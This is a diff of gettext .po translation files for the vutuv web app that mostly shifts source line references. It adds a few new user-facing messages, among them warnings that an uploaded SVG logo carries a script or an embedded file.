+#: lib/vutuv_web/components/press_kit_components.ex:389
 #, elixir-autogen, elixir-format
 msgid "Download %{format}"
 msgstr ""
@@ -23902,12 +23902,12 @@ msgstr ""
 msgid "Download photo"
 msgstr ""
 
-#: lib/vutuv/press_kit.ex:788
+#: lib/vutuv/press_kit.ex:811
 #, elixir-autogen, elixir-format
 msgid "Free for editorial use with credit."
 msgstr ""
 
-#: lib/vutuv_web/agent_docs/markdown.ex:1563
+#: lib/vutuv_web/agent_docs/markdown.ex:1567
 #, elixir-autogen, elixir-format
 msgid "PNG version"
 msgstr ""
@@ -23927,27 +23927,27 @@ msgstr ""
 msgid "Video is being checked"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1251
+#: lib/vutuv_web/live/press_kit_live.ex:1276
 #, elixir-autogen, elixir-format
 msgid "Copies the vector file this page's logo was uploaded as onto this shelf."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1324
+#: lib/vutuv_web/live/press_kit_live.ex:1349
 #, elixir-autogen, elixir-format
 msgid "The page's logo as a file, one tile per variant. A vector (SVG) is what a printer asks for; a PNG is what everybody else can open."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1248
+#: lib/vutuv_web/live/press_kit_live.ex:1273
 #, elixir-autogen, elixir-format
 msgid "Use the page's own logo"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:779
+#: lib/vutuv_web/live/press_kit_live.ex:804
 #, elixir-autogen, elixir-format
 msgid "What a journalist writing about this page may download: photos in print quality and its logo as a file. Everything here is public and free for editorial use as long as the credit is shown."
 msgstr ""
 
-#: lib/vutuv_web/components/press_kit_components.ex:570
+#: lib/vutuv_web/components/press_kit_components.ex:607
 #: lib/vutuv_web/components/ui.ex:3281
 #, elixir-autogen, elixir-format
 msgid "Report this picture"
@@ -24075,12 +24075,12 @@ msgstr ""
 msgid "Media Kit of %{name}"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1344
+#: lib/vutuv_web/live/press_kit_live.ex:1369
 #, elixir-autogen, elixir-format
 msgid "Remove this picture from this page's Media Kit?"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1346
+#: lib/vutuv_web/live/press_kit_live.ex:1371
 #, elixir-autogen, elixir-format
 msgid "Remove this picture from your Media Kit?"
 msgstr ""
@@ -24100,8 +24100,8 @@ msgstr ""
 msgid "press kit media journalist photographer download original print logo svg credit copyright presse pressefotos pressemappe medienkit mediakit fotos logo herunterladen bildnachweis"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4664
-#: lib/vutuv_web/components/post_components.ex:4714
+#: lib/vutuv_web/components/post_components.ex:4667
+#: lib/vutuv_web/components/post_components.ex:4717
 #, elixir-autogen, elixir-format
 msgid "Copy link to post"
 msgstr ""
@@ -24190,14 +24190,14 @@ msgstr ""
 msgid "Your uploads are not limited."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:672
+#: lib/vutuv_web/live/press_kit_live.ex:697
 #, elixir-autogen, elixir-format
 msgid "%{formatted} word"
 msgid_plural "%{formatted} words"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:756
+#: lib/vutuv_web/live/press_kit_live.ex:781
 #, elixir-autogen, elixir-format
 msgid "A paragraph an article can end on."
 msgstr ""
@@ -24209,22 +24209,22 @@ msgstr ""
 msgid "About %{name}"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:749
+#: lib/vutuv_web/live/press_kit_live.ex:774
 #, elixir-autogen, elixir-format
 msgid "About %{words} words. A paragraph at the end of an article."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:743
+#: lib/vutuv_web/live/press_kit_live.ex:768
 #, elixir-autogen, elixir-format
 msgid "About %{words} words. The two sentences under a photo."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:723
+#: lib/vutuv_web/live/press_kit_live.ex:748
 #, elixir-autogen, elixir-format
 msgid "An @handle links to that profile and notifies nobody."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:753
+#: lib/vutuv_web/live/press_kit_live.ex:778
 #, elixir-autogen, elixir-format
 msgid "As long as you like. The whole portrait."
 msgstr ""
@@ -24239,7 +24239,7 @@ msgstr ""
 msgid "Medium version"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:681
+#: lib/vutuv_web/live/press_kit_live.ex:706
 #, elixir-autogen, elixir-format
 msgid "Nothing written yet."
 msgstr ""
@@ -24254,22 +24254,22 @@ msgstr ""
 msgid "Take whichever length fits the space you have. Each one stands on its own."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:757
+#: lib/vutuv_web/live/press_kit_live.ex:782
 #, elixir-autogen, elixir-format
 msgid "The whole story, for as long as it needs."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:630
+#: lib/vutuv_web/live/press_kit_live.ex:655
 #, elixir-autogen, elixir-format
 msgid "Three bios in three lengths, so a journalist can take the one that fits. You write them; nothing is made out of your CV."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:755
+#: lib/vutuv_web/live/press_kit_live.ex:780
 #, elixir-autogen, elixir-format
 msgid "Two sentences a caption can carry."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:691
+#: lib/vutuv_web/live/press_kit_live.ex:716
 #, elixir-autogen, elixir-format
 msgid "Write"
 msgstr ""
@@ -24379,7 +24379,7 @@ msgstr ""
 msgid "Your post appears as soon as the video is ready"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3649
+#: lib/vutuv_web/components/post_components.ex:3653
 #, elixir-autogen, elixir-format
 msgid "Found through %{server}"
 msgstr ""
@@ -24578,22 +24578,22 @@ msgstr[1] ""
 msgid "Very busy on other servers right now:"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:904
+#: lib/vutuv_web/live/press_kit_live.ex:929
 #, elixir-autogen, elixir-format
 msgid "A picture still being checked is not public yet."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:907
+#: lib/vutuv_web/live/press_kit_live.ex:932
 #, elixir-autogen, elixir-format
 msgid "A visitor sees a pixelated stand-in in its place and can download nothing. The mark goes by itself when the check is through."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1269
+#: lib/vutuv_web/live/press_kit_live.ex:1294
 #, elixir-autogen, elixir-format
 msgid "Logo variants, further down this page, take this format."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1268
+#: lib/vutuv_web/live/press_kit_live.ex:1293
 #, elixir-autogen, elixir-format
 msgid "Press photos, further up this page, take this format."
 msgstr ""
@@ -24668,7 +24668,7 @@ msgstr ""
 msgid "You can only send files to members you are connected with."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3739
+#: lib/vutuv_web/components/post_components.ex:3742
 #, elixir-autogen, elixir-format
 msgid "Report this post as not appropriate? Every copy of it disappears right away, for everyone on this vutuv."
 msgstr ""
@@ -24678,7 +24678,7 @@ msgstr ""
 msgid "Thank you. Every copy on this vutuv is gone."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3744
+#: lib/vutuv_web/components/post_components.ex:3747
 #, elixir-autogen, elixir-format
 msgid "Report this post as not appropriate? This copy disappears right away, for everyone on this vutuv. Copies other servers sent us stay."
 msgstr ""
@@ -24758,7 +24758,22 @@ msgstr ""
 msgid "the page %{page} itself was reported on vutuv."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3707
+#: lib/vutuv_web/components/post_components.ex:3688
 #, elixir-autogen, elixir-format
 msgid "Found through these servers"
+msgstr ""
+
+#: lib/vutuv_web/live/press_kit_live.ex:542
+#, elixir-autogen, elixir-format
+msgid "This logo carries a script, in an attribute whose name starts with %{marker}. Whoever downloads it runs that script when they open the file, so export the logo without any interactivity."
+msgstr ""
+
+#: lib/vutuv_web/live/press_kit_live.ex:555
+#, elixir-autogen, elixir-format
+msgid "This logo contains %{marker}, which vutuv reads as an embedded file and cannot decode. Remove it, or reword the title or description it sits in."
+msgstr ""
+
+#: lib/vutuv_web/live/press_kit_live.ex:549
+#, elixir-autogen, elixir-format
+msgid "This logo has a file embedded in it, usually a web font, that vutuv cannot check. Export it again with the text converted to outlines."
 msgstr ""

--- a/priv/gettext/en/LC_MESSAGES/default.po
+++ b/priv/gettext/en/LC_MESSAGES/default.po
@@ -119,8 +119,8 @@ msgstr ""
 #: lib/vutuv_web/live/organization_live/edit.ex:378
 #: lib/vutuv_web/live/organization_live/new.ex:222
 #: lib/vutuv_web/live/post_live/composer.ex:2049
-#: lib/vutuv_web/live/press_kit_live.ex:729
-#: lib/vutuv_web/live/press_kit_live.ex:1139
+#: lib/vutuv_web/live/press_kit_live.ex:754
+#: lib/vutuv_web/live/press_kit_live.ex:1164
 #: lib/vutuv_web/templates/ad/new.html.heex:136
 #: lib/vutuv_web/templates/admin/legal_page/edit.html.heex:40
 #: lib/vutuv_web/templates/admin/newsletter/form_content.html.heex:57
@@ -163,7 +163,7 @@ msgstr ""
 msgid "Couldn't follow back to %{name}."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4701
+#: lib/vutuv_web/components/post_components.ex:4704
 #: lib/vutuv_web/components/ui.ex:5042
 #: lib/vutuv_web/live/admin/job_live.ex:486
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:621
@@ -211,15 +211,15 @@ msgstr ""
 msgid "Download"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4666
+#: lib/vutuv_web/components/post_components.ex:4669
 #: lib/vutuv_web/components/ui.ex:5033
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:613
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:649
 #: lib/vutuv_web/live/job_posting_live/dashboard.ex:150
 #: lib/vutuv_web/live/job_posting_live/show.ex:201
 #: lib/vutuv_web/live/organization_live/show.ex:159
-#: lib/vutuv_web/live/press_kit_live.ex:691
-#: lib/vutuv_web/live/press_kit_live.ex:1056
+#: lib/vutuv_web/live/press_kit_live.ex:716
+#: lib/vutuv_web/live/press_kit_live.ex:1081
 #: lib/vutuv_web/templates/admin/legal_page/index.html.heex:50
 #: lib/vutuv_web/templates/admin/newsletter/edit.html.heex:7
 #: lib/vutuv_web/templates/admin/newsletter/show.html.heex:19
@@ -620,8 +620,8 @@ msgstr ""
 #: lib/vutuv_web/components/ui.ex:4934
 #: lib/vutuv_web/live/organization_live/edit.ex:376
 #: lib/vutuv_web/live/post_live/composer.ex:2376
-#: lib/vutuv_web/live/press_kit_live.ex:727
-#: lib/vutuv_web/live/press_kit_live.ex:1138
+#: lib/vutuv_web/live/press_kit_live.ex:752
+#: lib/vutuv_web/live/press_kit_live.ex:1163
 #: lib/vutuv_web/templates/admin/pref/index.html.heex:71
 #: lib/vutuv_web/templates/admin/user_pref/show.html.heex:84
 #: lib/vutuv_web/templates/settings/apps.html.heex:63
@@ -655,7 +655,7 @@ msgstr ""
 #: lib/vutuv_web/live/search_live.ex:680
 #: lib/vutuv_web/live/shell_live.ex:1495
 #: lib/vutuv_web/live/shell_live.ex:1702
-#: lib/vutuv_web/live/tag_live/timeline.ex:353
+#: lib/vutuv_web/live/tag_live/timeline.ex:354
 #: lib/vutuv_web/templates/admin/account/index.html.heex:23
 #: lib/vutuv_web/templates/admin/account/index.html.heex:35
 #: lib/vutuv_web/templates/admin/tag/index.html.heex:30
@@ -1187,7 +1187,7 @@ msgstr ""
 msgid "All tag urls"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5319
+#: lib/vutuv_web/components/post_components.ex:5322
 #: lib/vutuv_web/templates/admin/tag/index.html.heex:2
 #: lib/vutuv_web/templates/tag/index.html.heex:1
 #: lib/vutuv_web/templates/user/show.html.heex:643
@@ -2079,7 +2079,7 @@ msgstr ""
 #: lib/vutuv_web/live/post_live/composer.ex:2147
 #: lib/vutuv_web/live/post_live/composer.ex:2170
 #: lib/vutuv_web/live/post_live/composer.ex:2196
-#: lib/vutuv_web/live/press_kit_live.ex:1307
+#: lib/vutuv_web/live/press_kit_live.ex:1332
 #, elixir-autogen, elixir-format
 msgid "Cancel upload"
 msgstr ""
@@ -2089,7 +2089,7 @@ msgstr ""
 msgid "Delete post"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4698
+#: lib/vutuv_web/components/post_components.ex:4701
 #: lib/vutuv_web/live/post_live/edit.ex:151
 #, elixir-autogen, elixir-format
 msgid "Delete this post permanently?"
@@ -2105,7 +2105,7 @@ msgstr ""
 #: lib/vutuv_web/gettext_extraction_anchors.ex:87
 #: lib/vutuv_web/live/organization_live/feed.ex:203
 #: lib/vutuv_web/live/post_live/feed.ex:366
-#: lib/vutuv_web/live/post_live/feed.ex:3594
+#: lib/vutuv_web/live/post_live/feed.ex:3592
 #: lib/vutuv_web/live/post_live/feed_calendar.ex:46
 #: lib/vutuv_web/live/shell_live.ex:1346
 #: lib/vutuv_web/live/shell_live.ex:1692
@@ -2134,8 +2134,8 @@ msgstr ""
 msgid "Hide this post from…"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4644
-#: lib/vutuv_web/components/post_components.ex:4646
+#: lib/vutuv_web/components/post_components.ex:4647
+#: lib/vutuv_web/components/post_components.ex:4649
 #, elixir-autogen, elixir-format
 msgid "Limited audience"
 msgstr ""
@@ -2151,7 +2151,7 @@ msgstr ""
 msgid "No more than %{max} images per post."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3935
+#: lib/vutuv_web/live/post_live/feed.ex:3933
 #, elixir-autogen, elixir-format
 msgid "Nothing here yet. Follow people to fill your feed, or write your first post."
 msgstr ""
@@ -2182,7 +2182,7 @@ msgstr ""
 msgid "Post deleted successfully."
 msgstr ""
 
-#: lib/vutuv_web/agent_docs/post_doc.ex:243
+#: lib/vutuv_web/agent_docs/post_doc.ex:244
 #: lib/vutuv_web/controllers/post_controller.ex:69
 #: lib/vutuv_web/controllers/post_controller.ex:90
 #: lib/vutuv_web/controllers/user_controller.ex:77
@@ -2200,13 +2200,13 @@ msgstr ""
 msgid "Posts"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5192
-#: lib/vutuv_web/components/post_components.ex:5196
+#: lib/vutuv_web/components/post_components.ex:5195
+#: lib/vutuv_web/components/post_components.ex:5199
 #, elixir-autogen, elixir-format
 msgid "Read more"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5193
+#: lib/vutuv_web/components/post_components.ex:5196
 #: lib/vutuv_web/live/fediverse_account_live.ex:394
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:146
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:236
@@ -2228,7 +2228,7 @@ msgstr ""
 #: lib/vutuv_web/live/post_live/saved.ex:666
 #: lib/vutuv_web/live/post_live/saved.ex:694
 #: lib/vutuv_web/live/post_rewrites_live.ex:376
-#: lib/vutuv_web/live/press_kit_live.ex:1065
+#: lib/vutuv_web/live/press_kit_live.ex:1090
 #: lib/vutuv_web/templates/connection/index.html.heex:45
 #: lib/vutuv_web/views/settings_html.ex:386
 #, elixir-autogen, elixir-format
@@ -2260,7 +2260,7 @@ msgstr ""
 #: lib/vutuv_web/attachment_text.ex:73
 #: lib/vutuv_web/live/post_live/composer.ex:1615
 #: lib/vutuv_web/live/post_live/composer.ex:1720
-#: lib/vutuv_web/live/press_kit_live.ex:541
+#: lib/vutuv_web/live/press_kit_live.ex:566
 #, elixir-autogen, elixir-format
 msgid "That file could not be processed."
 msgstr ""
@@ -2304,27 +2304,27 @@ msgstr ""
 msgid "What's new? Markdown is supported."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4641
+#: lib/vutuv_web/components/post_components.ex:4644
 #, elixir-autogen, elixir-format
 msgid "edited"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6959
+#: lib/vutuv_web/components/post_components.ex:6962
 #, elixir-autogen, elixir-format
 msgid "everyone else"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6963
+#: lib/vutuv_web/components/post_components.ex:6966
 #, elixir-autogen, elixir-format
 msgid "logged-out visitors"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6961
+#: lib/vutuv_web/components/post_components.ex:6964
 #, elixir-autogen, elixir-format
 msgid "people who don't follow you"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6962
+#: lib/vutuv_web/components/post_components.ex:6965
 #, elixir-autogen, elixir-format
 msgid "people you don't follow"
 msgstr ""
@@ -2371,7 +2371,7 @@ msgid "All posts"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2186
-#: lib/vutuv_web/components/post_components.ex:7062
+#: lib/vutuv_web/components/post_components.ex:7065
 #: lib/vutuv_web/components/ui.ex:4476
 #: lib/vutuv_web/views/user_html.ex:476
 #, elixir-autogen, elixir-format
@@ -2390,7 +2390,7 @@ msgid "Bookmarks"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2130
-#: lib/vutuv_web/components/post_components.ex:7303
+#: lib/vutuv_web/components/post_components.ex:7279
 #: lib/vutuv_web/components/ui.ex:4462
 #: lib/vutuv_web/notification_line.ex:342
 #: lib/vutuv_web/views/user_html.ex:486
@@ -2399,7 +2399,7 @@ msgid "Like"
 msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1301
-#: lib/vutuv_web/components/post_components.ex:7313
+#: lib/vutuv_web/components/post_components.ex:7289
 #: lib/vutuv_web/live/post_live/saved.ex:193
 #: lib/vutuv_web/live/post_live/saved.ex:526
 #: lib/vutuv_web/live/shell_live.ex:1596
@@ -2420,13 +2420,13 @@ msgstr ""
 msgid "Nothing here yet. Posts you like show up here."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7050
+#: lib/vutuv_web/components/post_components.ex:7053
 #, elixir-autogen, elixir-format
 msgid "Only public posts can be reposted."
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2185
-#: lib/vutuv_web/components/post_components.ex:7061
+#: lib/vutuv_web/components/post_components.ex:7064
 #: lib/vutuv_web/live/post_live/saved.ex:822
 #: lib/vutuv_web/views/user_html.ex:476
 #, elixir-autogen, elixir-format
@@ -2434,26 +2434,26 @@ msgid "Remove bookmark"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2166
-#: lib/vutuv_web/components/post_components.ex:7046
+#: lib/vutuv_web/components/post_components.ex:7049
 #: lib/vutuv_web/live/job_posting_live/dashboard.ex:168
 #, elixir-autogen, elixir-format
 msgid "Repost"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2759
-#: lib/vutuv_web/components/post_components.ex:6065
+#: lib/vutuv_web/components/post_components.ex:6068
 #, elixir-autogen, elixir-format
 msgid "Reposted by %{name}"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2165
-#: lib/vutuv_web/components/post_components.ex:7045
+#: lib/vutuv_web/components/post_components.ex:7048
 #, elixir-autogen, elixir-format
 msgid "Undo repost"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2129
-#: lib/vutuv_web/components/post_components.ex:7302
+#: lib/vutuv_web/components/post_components.ex:7278
 #: lib/vutuv_web/live/post_live/saved.ex:821
 #: lib/vutuv_web/views/user_html.ex:486
 #, elixir-autogen, elixir-format
@@ -2481,7 +2481,7 @@ msgstr ""
 msgid "Welcome to vutuv!"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7357
+#: lib/vutuv_web/components/post_components.ex:7333
 #, elixir-autogen, elixir-format
 msgid "Only public posts can be answered."
 msgstr ""
@@ -2493,8 +2493,8 @@ msgid "Replies"
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2375
-#: lib/vutuv_web/components/post_components.ex:7340
-#: lib/vutuv_web/components/post_components.ex:7341
+#: lib/vutuv_web/components/post_components.ex:7316
+#: lib/vutuv_web/components/post_components.ex:7317
 #: lib/vutuv_web/live/notification_live/index.ex:993
 #: lib/vutuv_web/live/post_live/reply.ex:49
 #: lib/vutuv_web/notification_line.ex:339
@@ -2502,7 +2502,7 @@ msgstr ""
 msgid "Reply"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4600
+#: lib/vutuv_web/components/post_components.ex:4603
 #, elixir-autogen, elixir-format
 msgid "Reply to a deleted post"
 msgstr ""
@@ -2523,7 +2523,7 @@ msgstr ""
 msgid "replied to your post."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4118
+#: lib/vutuv_web/components/post_components.ex:4121
 #: lib/vutuv_web/live/post_live/remote_post_reply.ex:63
 #: lib/vutuv_web/live/post_live/remote_reply.ex:61
 #: lib/vutuv_web/live/post_live/reply.ex:63
@@ -2531,14 +2531,14 @@ msgstr ""
 msgid "Reply to %{handle}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4572
+#: lib/vutuv_web/components/post_components.ex:4575
 #, elixir-autogen, elixir-format
 msgid "Reply to a now-deleted post by %{handle}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4563
-#: lib/vutuv_web/components/post_components.ex:4592
+#: lib/vutuv_web/components/post_components.ex:4566
 #: lib/vutuv_web/components/post_components.ex:4595
+#: lib/vutuv_web/components/post_components.ex:4598
 #, elixir-autogen, elixir-format
 msgid "Replying to %{handle}"
 msgstr ""
@@ -2838,7 +2838,7 @@ msgid_plural "connections"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:6960
+#: lib/vutuv_web/components/post_components.ex:6963
 #, elixir-autogen, elixir-format
 msgid "people who aren't your connections"
 msgstr ""
@@ -3090,7 +3090,7 @@ msgstr ""
 msgid "Only visible to you"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4539
+#: lib/vutuv_web/components/post_components.ex:4542
 #, elixir-autogen, elixir-format
 msgid "Only you can see this post while a report about it is handled."
 msgstr ""
@@ -3150,8 +3150,8 @@ msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:1467
 #: lib/vutuv_web/components/post_components.ex:3419
-#: lib/vutuv_web/components/post_components.ex:3627
-#: lib/vutuv_web/components/post_components.ex:4769
+#: lib/vutuv_web/components/post_components.ex:3631
+#: lib/vutuv_web/components/post_components.ex:4772
 #: lib/vutuv_web/live/organization_live/show.ex:684
 #: lib/vutuv_web/templates/user/show.html.heex:252
 #, elixir-autogen, elixir-format
@@ -3862,7 +3862,7 @@ msgstr ""
 msgid "People %{name} follows"
 msgstr ""
 
-#: lib/vutuv_web/agent_docs/post_doc.ex:244
+#: lib/vutuv_web/agent_docs/post_doc.ex:245
 #, elixir-autogen, elixir-format
 msgid "Post archive of %{name}"
 msgstr ""
@@ -4493,7 +4493,7 @@ msgstr ""
 msgid "You unblocked @%{slug}."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3940
+#: lib/vutuv_web/live/post_live/feed.ex:3938
 #, elixir-autogen, elixir-format
 msgid "Discover people to follow"
 msgstr ""
@@ -5370,9 +5370,9 @@ msgstr ""
 msgid "Footer navigation"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4849
-#: lib/vutuv_web/components/post_components.ex:5458
-#: lib/vutuv_web/components/post_components.ex:5796
+#: lib/vutuv_web/components/post_components.ex:4852
+#: lib/vutuv_web/components/post_components.ex:5461
+#: lib/vutuv_web/components/post_components.ex:5799
 #: lib/vutuv_web/live/notification_live/index.ex:1069
 #: lib/vutuv_web/views/user_html.ex:133
 #, elixir-autogen, elixir-format
@@ -5413,7 +5413,7 @@ msgstr ""
 msgid "Type of email address"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:628
+#: lib/vutuv_web/live/press_kit_live.ex:653
 #: lib/vutuv_web/templates/user/edit.html.heex:256
 #, elixir-autogen, elixir-format
 msgid "About you"
@@ -5738,7 +5738,7 @@ msgid "Name (A-Z)"
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/saved.ex:507
-#: lib/vutuv_web/live/tag_live/timeline.ex:453
+#: lib/vutuv_web/live/tag_live/timeline.ex:454
 #, elixir-autogen, elixir-format
 msgid "Newest first"
 msgstr ""
@@ -5764,7 +5764,7 @@ msgid "Nothing here yet. People you like show up here."
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/saved.ex:508
-#: lib/vutuv_web/live/tag_live/timeline.ex:454
+#: lib/vutuv_web/live/tag_live/timeline.ex:455
 #, elixir-autogen, elixir-format
 msgid "Oldest first"
 msgstr ""
@@ -5786,7 +5786,7 @@ msgid "Search saved items"
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/saved.ex:570
-#: lib/vutuv_web/live/tag_live/timeline.ex:369
+#: lib/vutuv_web/live/tag_live/timeline.ex:370
 #, elixir-autogen, elixir-format
 msgid "Sort"
 msgstr ""
@@ -6178,7 +6178,7 @@ msgid "View all phone numbers"
 msgstr ""
 
 #: lib/vutuv_web/live/feed_languages_live.ex:235
-#: lib/vutuv_web/live/press_kit_live.ex:979
+#: lib/vutuv_web/live/press_kit_live.ex:1004
 #: lib/vutuv_web/live/section_reorder_live.ex:128
 #, elixir-autogen, elixir-format
 msgid "Drag to reorder"
@@ -6191,7 +6191,7 @@ msgstr ""
 
 #: lib/vutuv_web/live/feed_languages_live.ex:267
 #: lib/vutuv_web/live/post_rewrites_live.ex:364
-#: lib/vutuv_web/live/press_kit_live.ex:1041
+#: lib/vutuv_web/live/press_kit_live.ex:1066
 #: lib/vutuv_web/live/section_reorder_live.ex:156
 #, elixir-autogen, elixir-format
 msgid "Move down"
@@ -6199,7 +6199,7 @@ msgstr ""
 
 #: lib/vutuv_web/live/feed_languages_live.ex:256
 #: lib/vutuv_web/live/post_rewrites_live.ex:352
-#: lib/vutuv_web/live/press_kit_live.ex:1030
+#: lib/vutuv_web/live/press_kit_live.ex:1055
 #: lib/vutuv_web/live/section_reorder_live.ex:147
 #, elixir-autogen, elixir-format
 msgid "Move up"
@@ -6564,8 +6564,8 @@ msgid "Turn a switch off and the matching opt-out rides along on the pages and r
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:3346
-#: lib/vutuv_web/components/post_components.ex:4722
-#: lib/vutuv_web/components/post_components.ex:4736
+#: lib/vutuv_web/components/post_components.ex:4725
+#: lib/vutuv_web/components/post_components.ex:4739
 #: lib/vutuv_web/components/ui.ex:3226
 #: lib/vutuv_web/live/fediverse_account_live.ex:437
 #: lib/vutuv_web/live/organization_live/following.ex:385
@@ -6593,7 +6593,7 @@ msgstr ""
 msgid "Remove this connection? You will stop following them."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4722
+#: lib/vutuv_web/components/post_components.ex:4725
 #: lib/vutuv_web/components/ui.ex:3225
 #: lib/vutuv_web/live/fediverse_account_live.ex:435
 #: lib/vutuv_web/live/organization_live/following.ex:385
@@ -6787,7 +6787,7 @@ msgid "Filter"
 msgstr ""
 
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:591
-#: lib/vutuv_web/live/tag_live/timeline.ex:335
+#: lib/vutuv_web/live/tag_live/timeline.ex:336
 #, elixir-autogen, elixir-format
 msgid "Filters"
 msgstr ""
@@ -7286,7 +7286,7 @@ msgid "applies to the whole list, not just this page"
 msgstr ""
 
 #: lib/vutuv_web/components/job_components.ex:190
-#: lib/vutuv_web/components/post_components.ex:7213
+#: lib/vutuv_web/components/post_components.ex:7189
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:980
 #: lib/vutuv_web/live/shell_live.ex:1830
 #, elixir-autogen, elixir-format
@@ -7391,9 +7391,9 @@ msgstr ""
 #: lib/vutuv_web/components/welcome_components.ex:362
 #: lib/vutuv_web/live/admin/media_live.ex:270
 #: lib/vutuv_web/live/admin/newsletter_broadcast_live.ex:174
-#: lib/vutuv_web/live/post_live/feed.ex:4234
+#: lib/vutuv_web/live/post_live/feed.ex:4232
 #: lib/vutuv_web/live/post_rewrites_live.ex:447
-#: lib/vutuv_web/live/press_kit_live.ex:1056
+#: lib/vutuv_web/live/press_kit_live.ex:1081
 #, elixir-autogen
 msgid "Done"
 msgstr ""
@@ -7855,7 +7855,7 @@ msgstr ""
 #: lib/vutuv_web/live/admin/media_live.ex:146
 #: lib/vutuv_web/live/admin/user_live.ex:184
 #: lib/vutuv_web/live/job_board_live.ex:319
-#: lib/vutuv_web/live/tag_live/timeline.ex:399
+#: lib/vutuv_web/live/tag_live/timeline.ex:400
 #, elixir-autogen, elixir-format
 msgid "Clear filters"
 msgstr ""
@@ -8732,7 +8732,7 @@ msgstr ""
 msgid "CV download"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6068
+#: lib/vutuv_web/components/post_components.ex:6071
 #, elixir-autogen, elixir-format
 msgid "Reposted by %{name} and %{formatted} other"
 msgid_plural "Reposted by %{name} and %{formatted} others"
@@ -11994,7 +11994,7 @@ msgid "Everyone (public)"
 msgstr ""
 
 #: lib/vutuv_web/live/job_posting_live/form.ex:681
-#: lib/vutuv_web/live/tag_live/timeline.ex:380
+#: lib/vutuv_web/live/tag_live/timeline.ex:381
 #: lib/vutuv_web/templates/education/form_content.html.heex:41
 #: lib/vutuv_web/templates/work_experience/form_content.html.heex:63
 #, elixir-autogen, elixir-format
@@ -12934,7 +12934,7 @@ msgstr ""
 msgid "Stop e-mail alerts for your saved search \"%{label}\"?"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4077
+#: lib/vutuv_web/components/post_components.ex:4080
 #: lib/vutuv_web/components/saved_search_components.ex:43
 #: lib/vutuv_web/controllers/settings_controller.ex:788
